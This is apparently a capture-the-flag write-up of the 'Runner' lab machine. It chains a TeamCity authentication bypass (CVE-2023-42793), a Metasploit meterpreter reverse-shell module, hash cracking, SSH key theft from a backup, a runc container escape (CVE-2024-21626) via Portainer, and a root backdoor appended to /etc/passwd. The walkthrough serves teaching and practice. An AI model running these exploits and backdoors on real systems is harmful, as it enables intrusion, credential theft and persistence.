Enumeration

As usual, we start off with an nmap scan revealing only 3 ports open:

# Nmap 7.94SVN scan initiated Wed Jul 10 22:16:37 2024 as: nmap -sS -sV -sC -O -oN scan_full.log -p- -T5 -Pn -v 10.129.230.247
Nmap scan report for 10.129.230.247
Host is up (0.11s latency).
Not shown: 65358 closed tcp ports (reset), 174 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesnt have a title (text/plain; charset=utf-8).
Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 7.051 days (since Wed Jul  3 21:09:41 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • 22: The standard SSH port, running OpenSSH 8.9p1. Nothing stands out as risky.
  • 80: A web server without TLS running nginx 1.18, which is not the latest but fairly recent. Nothing too risky here either. We see a redirect to runner.htb, which we can add to our /etc/hosts file (see below).
  • 8000: Fingerprinted by nmap as Nagios NSCA, though the plain-text HTTP response suggests something smaller (more on this shortly).
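
For example, mapping the hostname to the target using the IP from the scan above:

echo '10.129.230.247 runner.htb' | sudo tee -a /etc/hosts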

Enumerating the web server on port 80 reveals nothing more than a static site talking about offering CI/CD solutions.

Dirbusting this web server reveals nothing interesting, so we turn to ffuf to discover other virtual hosts on the system, using -fs 154 to filter out the default 154-byte response:

ffuf -w /opt/SecLists/Discovery/DNS/dns-Jhaddix.txt:FUZZ -u http://runner.htb/ -H 'Host: FUZZ.runner.htb' -t 30 -fs 154

This reveals the teamcity subdomain; after adding it to /etc/hosts as well, navigating to teamcity.runner.htb presents the JetBrains TeamCity application: https://www.jetbrains.com/teamcity/

At the time of writing, I have never used TeamCity but I’m aware of the functionality offered by such a product. It’s in the same realm as something like Jenkins or Azure DevOps. Typically, these programs offer pipelines with scripting functionality where reverse shells can be obtained, or they offer build agents that run scripts during pipeline executions.

This application requires credentials to log in, and no credentials or usernames have been found yet.

Continuing on to enumerate the website running on port 8000 reveals nothing else of interest. There are /health and /version endpoints, but they return only OK and 0.0.0-src respectively. Neither Wappalyzer nor WhatWeb can determine the technologies in use, and interrogating the requests with Burp Suite doesn't show anything interesting. This application is probably a dead end, simply because of how barren and small the attack surface is.
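
The two endpoints can be confirmed directly (responses are OK and 0.0.0-src, as noted):

curl http://runner.htb:8000/health
curl http://runner.htb:8000/version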

Back at the TeamCity login, we see at the bottom of the login portal a version number, Version 2023.05.3 (build 129390), and doing the old Googling reveals CVE-2023-42793 along with a PoC: https://github.com/H454NSec/CVE-2023-42793

This PoC exploits an authentication bypass in the TeamCity API. First, a DELETE /app/rest/users/id:1/tokens/RPC2 request removes the existing admin user's RPC2 token; then a POST /app/rest/users/id:1/tokens/RPC2 request generates a new token for that user. Nothing in this process requires credentials, and the response hands back a token intended to be the admin's authentication token. The PoC then uses this token to create a new user.
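
The bypass boils down to two unauthenticated requests; a minimal sketch of what the PoC does under the hood:

curl -X DELETE http://teamcity.runner.htb/app/rest/users/id:1/tokens/RPC2
curl -X POST http://teamcity.runner.htb/app/rest/users/id:1/tokens/RPC2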

TeamCity Exploit

I made modifications to the PoC above to send my own username and password and ran it as such:

python3 CVE-2023-42793.py -u http://teamcity.runner.htb/

This returned a credential to log in with:

[+] http://teamcity.runner.htb/login.html [pentester5736:Pentester123!]

Logging in didn't do much good initially: there are no projects set up and only two users, John and Matthew. It seems this is a fresh instance of TeamCity.

More Googling reveals that you can get code execution by uploading a malicious plugin to the TeamCity instance. However, doing this manually is unnecessary: there is a Metasploit module that uses the CVE above to get a reverse shell for us and handles cleaning up the plugin it uses along the way.

In Metasploit:

use exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793
set RHOSTS <target>
set RPORT 80
set VHOST teamcity.runner.htb
set TARGET 1
set payload payload/cmd/linux/https/x64/meterpreter/reverse_tcp
set LPORT <lport>
set LHOST tun0
run

Running this gives us a reverse shell as the tcuser account. This is not the user account with a flag; we have landed in a Docker container running the TeamCity instance!

Pwning the User

Poking through the settings in the TeamCity portal, there is a warning that the instance is using the HSQL database and that it should not be used in production.

HSQL stores its data as files inside the system directory of the TeamCity instance, which can be found at /data/teamcity_server/datadir/system. Inside this directory there is a file, buildserver.data, that contains some of the DB data. I copied this file back to my machine using the meterpreter session to interrogate it further.
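
Pulling the file back is a one-liner from the active meterpreter session:

meterpreter > download /data/teamcity_server/datadir/system/buildserver.data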

There are a few interesting findings in the data:

  • A New SSH key uploaded entry, indicating there is an SSH key somewhere, but I was not able to find the key in the data, nor could I find one in the file system.
  • matthew $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em Matthew [email protected] is a bcrypt hash for the matthew user.
  • admin $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye John [email protected] is another bcrypt hash, this one for the john user, who is also the admin.

Matthew's hash can be cracked using hashcat and rockyou, but I wasn't successful at cracking john's, and bcrypt is much slower to crack than something like NTLM.

hashcat -O -m 3200 hashes /usr/share/wordlists/rockyou.txt
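
Once the run completes, the cracked result can be redisplayed from the potfile at any time:

hashcat -m 3200 hashes --show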

This gives us the credential matthew:piper123. Logging in with this via SSH does not work, and logging in to the TeamCity portal as this user is fruitless as well, since it has even less capability than our original TeamCity admin account.

The SSH key that was mentioned is the likely way to access the box, probably as the john user. My understanding from reading the TeamCity documentation is that uploaded SSH keys are for securing communication between the build agents and the TeamCity server. The same key also being used by john to log in seems weird, but it's entirely plausible that a lazy, tired or rushed user wouldn't go through the effort of creating a brand new SSH key and would just reuse the one they're familiar with. It's password reuse, but with SSH keys.

Finding the SSH key can't be done from within the box (as far as I'm aware). As a TeamCity admin, however, it's possible to trigger a backup, via the portal or even via the API, and the resulting zip file contains these SSH keys.

Heading to http://teamcity.runner.htb/admin/admin.html?item=backup allows us to start a backup. Default settings work fine.
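
Alternatively, the backup can be triggered from the command line with the token from the exploit; a sketch, assuming TeamCity's documented REST backup endpoint:

curl -X POST -H 'Authorization: Bearer <token>' 'http://teamcity.runner.htb/app/rest/server/backup?includeConfigs=true&fileName=backup'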

Once the backup zip file is unzipped, the id_rsa file can be found at ./config/projects/AllProjects/pluginData/ssh_keys/id_rsa. The key has no passphrase, so after running chmod 600 id_rsa (SSH refuses keys with loose permissions) it can be used as-is. We presume the admin john uploaded this SSH key as his login credential, which we then prove using ssh -i id_rsa john@$target, and we log in successfully!
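
Putting it together (the zip name here is illustrative; use whatever the backup produced):

unzip TeamCity_Backup.zip -d backup
chmod 600 backup/config/projects/AllProjects/pluginData/ssh_keys/id_rsa
ssh -i backup/config/projects/AllProjects/pluginData/ssh_keys/id_rsa john@runner.htb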

Escalation to Root

One of the first things I do when I get on a box, to gain better situational awareness, is run netstat -ntlp so that it's easy to see which listening ports were not publicly open. We immediately see a few that were not visible during the initial nmap scan:

Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::8000                 :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -

When I see this, my first thought is to drop the SSH connection and reconnect with a local port forward so I can see what these are.

ssh -L 9000:localhost:9000 -i id_rsa john@$target

Then I scan the forwarded port with nmap and attempt to view it in the browser in case it's a website. Luckily, it's a Portainer instance, which I am familiar with from my time as a developer. Portainer is basically a UI over Docker that allows for a visual way of managing containers, images, volumes, etc. It comes with a web UI and manages its own user accounts, separate from the machine it's on. These users can then either manage the containers running on that host, or manage containers running on other hosts and clusters. It makes managing containers at scale simpler.
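
A quick check of the forwarded port from the attacking machine:

nmap -sV -p 9000 localhost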

We are presented with a login screen, but we do not know john's credentials, so we try matthew:piper123 and see a successful login! Just because of how HTB typically works, given we can log in here and now with these credentials, I deferred any further enumeration of the box. Having an account on Portainer is great because only the Portainer service itself needs to be a member of the docker group to run containers; the trust model is that users allowed access to Portainer are allowed to deploy and manage containers too. Matthew's account on Portainer allows us to deploy containers.

My first hope was to deploy a container with the main host's file system mounted within, so I could just read/write /etc/shadow or /etc/passwd and gain control that way, but it was not possible.

There are two images available in Portainer: the TeamCity image and an Ubuntu image.

After doing more research, I found this article about abusing leaked file descriptors from the runc process (CVE-2024-21626): https://elmaalmi-billal.medium.com/vulnerability-docker-runc-process-cwd-and-leaked-fds-container-breakout-cve-2024-21626-d14ab2e1b53e. During container setup, a vulnerable runc leaks an open file descriptor pointing at a directory on the host; creating a new container whose working directory is /proc/self/fd/8 therefore drops the process into that host directory, from which the rest of the host file system is reachable via .. traversal.
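
For reference, with direct docker CLI access (which we don't have here, hence Portainer), the same breakout would be a one-liner; a sketch assuming a vulnerable runc and that fd 8 is the leaked descriptor:

docker run --rm -it -w /proc/self/fd/8 ubuntu bash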

In Portainer, this can be done by logging in, going to Containers > Create Container and setting:

  • Name to anything you like; it just identifies the container you will use to exploit the host
  • Image to be ubuntu
  • toggle off Always pull the image (since the machine has no internet access)
  • Working Dir to be /proc/self/fd/8
  • User to root
  • Console to be Interactive and TTY

Then click Deploy the container. This brings you to a screen listing the running containers. Click the one you created, then click the >_ Console button to access the container console, and finally Connect.

You will be granted a shell in the browser to interact with the Ubuntu container, which should have access to the host's file system. To get the root flag, it's as simple as cat ../../../../../../root/root.txt, but ideally we want shell access. Instead of grabbing the flag here, I tried to grab the root user's SSH key with cat ../../../../../../../root/.ssh/id_rsa; however, this account still requires a password to enter via SSH. Looking at /etc/shadow reveals a yescrypt-hashed password, which is slow for GPU cracking, and I didn't feel like cooking my CPU just for this password.

My solution to get full shell access and persistence was to create a password hash using openssl and append a new entry to /etc/passwd on the host:

openssl passwd <password_here>

echo 'pentester:<hash_from_openssl_above>:0:0:root:/root:/bin/bash' >> ../../../../../../etc/passwd
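
With the entry in place, SSHing to the host as the new user with the password chosen above yields a UID-0 shell:

ssh pentester@$target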

Now we have full access to the Runner host as a user with root privileges and the machine is complete.

Learnings

  • I spent most of my time in the TeamCity Docker container trying to find some way to break out. I had found the matthew account, but wasn't able to use its password anywhere useful at the time, and I had been unsuccessful cracking the john account's password. The key takeaway is to spend less time overcomplicating things; a Docker breakout is far harder than what was more likely needed, which was simply better enumeration. Had I done a better job reading the logs, I would have seen the SSH key mentioned earlier and gone down that path quicker.
  • Ideally, I would have enumerated the features of the TeamCity platform better once I had initial access. I could conceivably have skipped exploring the TeamCity Docker container if I had noticed the backup feature earlier.
  • The runc exploit is so simple to do that it will be one of those things I look for in the future as a quick win for Docker privilege escalation.